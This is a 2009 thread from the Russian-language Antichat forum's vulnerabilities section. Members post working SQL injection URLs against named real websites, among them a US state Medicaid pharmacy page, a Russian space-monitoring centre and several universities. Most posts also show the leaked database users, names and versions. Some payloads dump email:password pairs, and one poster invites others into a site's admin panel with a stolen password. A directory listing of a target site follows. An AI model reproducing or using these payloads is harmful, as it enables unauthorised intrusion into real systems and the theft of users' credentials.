ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11211  
Старый 10.11.2009, 22:24
Аватар для 2pick
2pick
Познающий
Регистрация: 17.03.2007
Сообщений: 98
Провел на форуме:
193152

Репутация: 45
Отправить сообщение для 2pick с помощью ICQ
По умолчанию

http://www.rustavi2.com/news/calendar_newsg.php?pg=&ddd=-2.9.2009%27%20UNION%20SELECT%201,2,3,user%28%29,ve rsion%28%29,6,7,8,9,10,11,12,13,14,15,16,17%23&ddd 2=2-9-2009&month=10&year=2009&wth=&ct=0&id_news=0

Походу дидосят... Ну вот докучи скуль
 
Ответить с цитированием

  #11212  
Старый 10.11.2009, 22:39
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

ПР6
http://health.utah.gov/medicaid/pharmacy/priorauthorization/view.php?id=-1+union+select+1,2,3,4,5--

ver: 4.1.6-gamma-standard-log
base: pharmacy
user: pharmadmin@hlcblxweb1.hl
os: pc-linux

Последний раз редактировалось jokester; 10.11.2009 в 22:57.. Причина: хеши
 
Ответить с цитированием

  #11213  
Старый 10.11.2009, 23:56
Аватар для [underwater]
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

Код:
http://group.ge/show.php?id_series=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Код:
http://www.dco.es/doxanews.php?id=-1+union+select+all+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6--
Код:
http://www.soundboards.com/comment.php?id=null%20union%20all%20select%201,2,3,concat(email,0x3a,password),5%20from%20users--

Последний раз редактировалось jokester; 11.11.2009 в 00:04.. Причина: asiakomoditi.com и mukeshmarwah.net БОЯНы
 
Ответить с цитированием

  #11214  
Старый 11.11.2009, 01:33
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Код:
http://erem.ru/pages/products.html?id=-11+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,8,10,11,12,13--
eremeevskoe:4.0.16:eremeevskoe@localhost

ТИЦ80
ПР2


ololo shkolota

Код:
http://dag.com.ua/nikolaev/schools/index.php?show=article&new_id=1+union%20all+select+1,null,null,null,null,null,null,null+--+
ТИЦ130
 
Ответить с цитированием

  #11215  
Старый 11.11.2009, 03:54
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Федеральное Космическое Агенство.Научный Центр Оперативного Мониторинга Земли.

Цитата:
http://catalog.ntsomz.ru/data_new/dataset/ds_det.php?ds=RRR'+union+select+null,BANNER||user, null,null,null,null,null,null,null,null,null,null, null,null,null+from+v$version--
Код:
CORE 9.2.0.1.0 Production||OMZ
Цитата:
http://thema.ntsomz.ru/modis/cgi/modis_proj.pl?id=2404&type=modis'+union+select+1,2 ,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,database(),use r(),version()),13--+
Код:
granules_products:granules_reader@localhost:5.0.45-log
 
Ответить с цитированием

  #11216  
Старый 11.11.2009, 12:34
Аватар для maestra_toys
maestra_toys
Banned
Регистрация: 08.11.2009
Сообщений: 26
Провел на форуме:
116719

Репутация: 15
Отправить сообщение для maestra_toys с помощью ICQ
По умолчанию

ТИЦ 20 ПР 5
Код:
http://www.insanely-great.com/news.php?id=-10655+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18 --
flamini_flaminio@216.14.208.109:flamini_igm:4.1.21-log

ПР 5
Код:
http://www.grfoundation.org/news.php?id=-62+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10
grcf@localhost:grcf:5.0.51a

Последний раз редактировалось jokester; 11.11.2009 в 12:42.. Причина: cipa.org.ua БОЯН
 
Ответить с цитированием

  #11217  
Старый 11.11.2009, 13:07
Аватар для s0l_ir0n
s0l_ir0n
Участник форума
Регистрация: 14.03.2009
Сообщений: 237
Провел на форуме:
813785

Репутация: 314
Отправить сообщение для s0l_ir0n с помощью ICQ
По умолчанию

Даже не знаю что это:
dekulk@localhost:dekulk:5.0.51a
Цитата:
http://www.dekulk.nl/doc.php?id=-1+union+select+1,2,3,ConCat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,5+--
Вывод скули через сохранение php файла
ws-univ@localhost:ws-univ:4.1.22
Цитата:
http://widener.webstudy.com/doc.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,ConCat_w s(0x3a,user(),database(),version()),14,15,16,17,18 ,19,20,21,22+--
Университет Танзании:
aru_web@localhost:aru_web:5.0.22
Цитата:
http://www.aru.ac.tz/doc.php?id=-1+union+select+ConCat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8,9,10,11+--
Сайт про остеохондроз:
h2ssd-m_root@localhost:h2ssd-m_spinet:5.0.45-log
Цитата:
http://spinet.ru/voting/stat.php?id=-1+union+select+1,ConCat_ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3--

Последний раз редактировалось s0l_ir0n; 11.11.2009 в 13:50..
 
Ответить с цитированием

  #11218  
Старый 11.11.2009, 13:49
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

flamman.se
Код:
http://www.flamman.se/senaste.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,user(),database(),version()))),4,5,6,7,8
Код:
u4517781@webludde.ballou.se:u4517781_1:4.1.13-standard
basketme.com
Код:
http://www.basketme.com/2.0/opinion.php?id=-70+UnIoN+SeLeCt+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8
Код:
cm187240@81.88.49.32:cm187240:5.0.60sp1-enterprise-gpl-log
diariodelasislas.es
Код:
http://www.diariodelasislas.es/opinion.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4
Код:
diario@localhost:diario:4.1.20

Последний раз редактировалось mailbrush; 11.11.2009 в 14:12..
 
Ответить с цитированием

  #11219  
Старый 11.11.2009, 14:58
Аватар для pelligrim
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию

Код:
http://www.severyanka.ru/news.php?id=12+union+select+1,2,3,version()--
4.1.22:stsbs_nsk_severyanka:stsbs-nsk_sever@212.193.229.149
есть таблица clients

Код:
http://www.region-media.ru/city.php?id=99989+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7--
5.0.22:wwwregionpressar_wwwregionmediar:region01_w wwregi@localhost

Код:
http://bfvz.ru/thanks.php?id=999999+union+select+1,concat_ws(0x3a,version(),database(),user()),3--
5.0.45:bfvz_bfvz:bfvz@localhost
 
Ответить с цитированием

  #11220  
Старый 11.11.2009, 17:19
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

сайтик как вы уже наверное догадались на финском)
Код:
http://www.ymparistokasvatus.fi/vihrealippu/osallistujat/show.php?id=-110+union+select+1,unhex(hex(concat_ws(0x3a,Id,username,password))),3,4,5,6,7,8,9,10,11,12+from+admins--
парольчик подходит, так што милости просим в админку)

погнали дальше!!!

http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,dat abase(),version(),user(),@@version_compile_os),26, 27,28,29,30--
zargon:4.1.12-standardc-linux-gnu-log:zargon@localhost

http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,use r_name,user_password),26,27,28,29,30+from+4images_ users--


http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,use r,passwd),26,27,28,29,30+from+users--
диры
Код:
/
/download/
/search/
/cgi-bin/
/images/
/news/
/links/
/support/
/forum/
/services/
/partners/
/banner/
/mobile/
/weather/
/entertainment/
/doc/
/chat/
/tv/
/multimedia/
/pictures/
/test/
/navigation/
/portfolio/
/polls/
/comics/
/pop/
/ssh/
/guestbook/
/bilder/
/co/
/presentation/
/inc/
/regional/
/iso/
/fonts/
/cinema/
/IT/
/mil/
/lunch/
/vortex/
/htdig/
/http%3A%2F%2Fwww/
/newsimages/
/reklam/
/happenings/
/cgi-bin2/
/regionalnews/
/contact/
/ws/
/messenger/
/tourism/
/webshop/
/newusers/
/faq/
/css/
/cat/
/isp/
/price/
/webcam/
/booking/
/icons/
/pub/
/users/
/errors/


--------------------------------
--------------------------------

Последний раз редактировалось 547; 11.11.2009 в 18:38..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ